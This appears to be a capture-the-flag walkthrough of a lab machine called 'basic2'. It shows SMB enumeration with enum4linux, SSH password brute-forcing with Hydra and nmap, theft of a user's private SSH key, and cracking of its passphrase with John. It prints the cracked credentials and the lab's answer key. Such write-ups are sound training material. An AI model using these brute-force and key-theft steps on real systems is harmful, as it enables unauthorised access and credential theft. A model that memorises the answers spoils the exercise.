User brute-forcing to find the username & password
Running Enum4Linux - To enumerate SMB
enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 9 22:26:17 2021
==========================
| Target Information |
==========================
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 10.10.21.87 |
===================================================
[+] Got domain/workgroup name: WORKGROUP
===========================================
| Nbtstat Information for 10.10.21.87 |
===========================================
Looking up status of 10.10.21.87
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on 10.10.21.87 |
====================================
[+] Server 10.10.21.87 allows sessions using username '', password ''
==========================================
| Getting domain SID for 10.10.21.87 |
==========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Cant determine if host is part of domain or part of a workgroup
=====================================
| OS information on 10.10.21.87 |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient:
[+] Got OS info for 10.10.21.87 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
============================
| Users on 10.10.21.87 |
============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
========================================
| Share Enumeration on 10.10.21.87 |
========================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous Mapping: OK, Listing: OK
//10.10.21.87/IPC$ [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================
| Password Policy Information for 10.10.21.87 |
===================================================
[+] Attaching to 10.10.21.87 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=============================
| Groups on 10.10.21.87 |
=============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================
| Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
============================================
| Getting printer info for 10.10.21.87 |
============================================
No printers returned.
We find two user names - jan and kay.
Now we'll try to bruteforce the password of jan.
Because, in the /development directory, we had a text file in which K (refers to kay) mentioned that the password of J (refers to jan) was easily crackable.
HYDRA:
Using Hydra to bruteforce the username and password
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05
Nmap NSE SSH-brute was faster than hydra.
nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST
NSE: [ssh-brute] Trying username/password pair: jan:jan
..
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-brute:
| Accounts:
| jan:armando - Valid credentials
|_ Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7
Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds
You can also use msfconsole to bruteforce the credentials.
We found jan's password:armando.
What is the username?
Answer: jan
What is the password?
Answer: armando
What service do you use to access the server(answer in abbreviation in all caps)?
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
We could find that there is a password backup file in kay's directory - pass.bak. But it has no read permission.
So, we'll try to run linpeas.sh to find possible vectors for priv esc.
wget linpeas.sh into any folder where you have the write permission.
jan@basic2:$ ./linpeas.sh
...
[+] Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
--> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow
...
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
.
.
.
-----END RSA PRIVATE KEY-----
After running, we find that the SSH private key (id_rsa) of Kay has read permissions.
Copy the contents of the id_rsa file. (Private Key) and store it in your local machine.
Try to login using the private key.
ssh -i flag - used for identity file.
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa':
It's asking for a password. But, we don't have it yet.
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Answer: We can try to escalate our privileges to gain root access. May be that user can have additional permissions which can be exploited to gain root access.
Now, we'll try to brute force the ssh passphrase using john.
Convert the id_rsa file using ssh2john.py so that it can be fed to John for bruteforcing the passphrase.
root@kali: usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
rrot@kali:john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (kay_id_rsa)
Session completed
Login using the the ssh private key and provide the passphrase.
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
References
Sometimes we can get the private key (id_rsa) through a variety of scenarios, like if we had read access due to LFI or even command injection allowing us to execute certain commands.